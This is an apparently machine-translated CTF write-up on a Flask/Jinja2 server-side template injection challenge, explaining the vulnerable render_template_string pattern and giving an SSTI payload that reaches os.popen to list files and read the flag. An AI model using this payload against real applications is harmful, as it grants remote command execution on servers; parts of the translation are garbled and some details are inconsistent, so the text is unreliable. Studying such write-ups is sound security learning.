Offensive and defensive world--WEB advanced--Web_python_template_injection


Why don't you want to get up after twelve o'clock?

This article is modeled on the template of the Wireup uploader, EnderN, to inject ideas.



python template injection

Understand this need----------Although I have not been exposed to this python template, I understand some basic python syntax.

python framework Flask related

Flask:python lightweight web development framework, based on Werkzeug WSGI toolkit and Jinja2 template engine

Jinja2 is the next widely used template engine in Python. Its design idea comes from Django's template engine and extends its syntax and a series of powerful functions. One of the most notable is the addition of sandbox execution and optional auto-escaping, which are very important for the security of most applications.

route Decorator route


use route the decorator tells Flask how is it like URL trigger function.route()Bind a function to the corresponding URL superior
 Equivalent to routing,A route follows a function

WSGT:python web server Gateway interface\web server and a simple and common interface between web applications or frameworks

Werkzeug WSGI: Encapsulates a lot of web framework things\Request\Response, etc.

  • Routing processing: how to find the corresponding view function according to the request URL
  • request and response encapsulation: provide a way to process requset and generate response object

Flask's render_template_string() function

This function uses %s to dynamically replace the string when rendering the template. When rendering, the content wrapped in {undefined{**}} will be parsed and replaced as a variable

template injection

Template engine: It is generated in order to separate the user interface from the business data (content). It can generate documents in a specific format. The template engine used for the website will generate a standard HTML document.

For convenience html code,Many websites use templates,write one first html template file


def test():
    code = request.args.get('id')
    html = '''
    '''%(code)//After the code is passed in, it is used to replace %s. This is controlled by user input. It is an unreliable input and is also the cause of the vulnerability.
    return render_template_string(html)

render_template_string()Yes Flask render method in:User-rendered strings and incoming parameters

render:The process of generating images from models with software,A model is a description of a three-dimensional object in a strictly order-one language or data structure,including geometry\viewpoint\Texture Lighting Information.

In this code, html is a simple template file. When developers use the style corresponding to this template, they can directly use the render_template_string() method to call the template to render the style directly.

template injection

Refers to passing a string of instructions instead of variables into the template and letting it execute

Take this code as an example: when passing in code, you can use the {{}} symbol to wrap a series of codes to replace the 'id' that should be a parameter

{{}} is used as a variable wrapping identifier in Jinja2, which can be used to identify variables and command execution

Determine whether there is template injection

Construct simple test url


executed and returned

Consider here how to obtain console permissions, os.system and os.popen

'os.system'-------The return value is the exit status code of the script

'os.popen'---------The return value is the output content during script execution

We want content, select os.popen

How to find this os.popen?

I don't know why it's called a magic method

__class__:Returns the class to which the object belongs

__mro__:Returns a tuple of base classes that a class inherits from,Methods are parsed in tuple order when parsing

__base__:Returns the base class that this class inherits from

__subclasses__:Each new class retains a reference to the subclass,This method returns a list of references that are still available in the class

__init__class initialization method

__globals__:a reference to a dictionary containing function global variables

start injecting

Find the class where the current variable is located


server reply

I am confused at the beginning, %7B and %7D are ASCII-encoded '{' and '}' respectively
Note that the underscores on both sides of the class are two underscores respectively

This reply tells us that the class of this variable is 'str'

Find its base class from this class


server reply

Find the reference list of any one of the base classes through the base class


Found the 'site._Printer' class where 'os' is located, at bit 72 of the list


Invoke the server console and display

directly in url box write:`''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()%7D%7D`

here`popen('ls').read()`is to get the directory and read,Print all files in the current directory on the web page

Construct another payload and read the content with cat

`''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()%7D%7D`

This is a very commonly used payload

one more question

Found the 'site._Printer' class where 'os' is located

How did you know about this? Found it here ------

look for contains OS module script

for item in ''.__class__.__mro__[1].__subclasses__():
         if 'os' in item.__init__.__globals__:
        print ('-')

Take it, life and death can't work

refer to

Tags: Python Front-end Web Security Flask

Posted by rmmo on Mon, 30 May 2022 04:18:12 +0530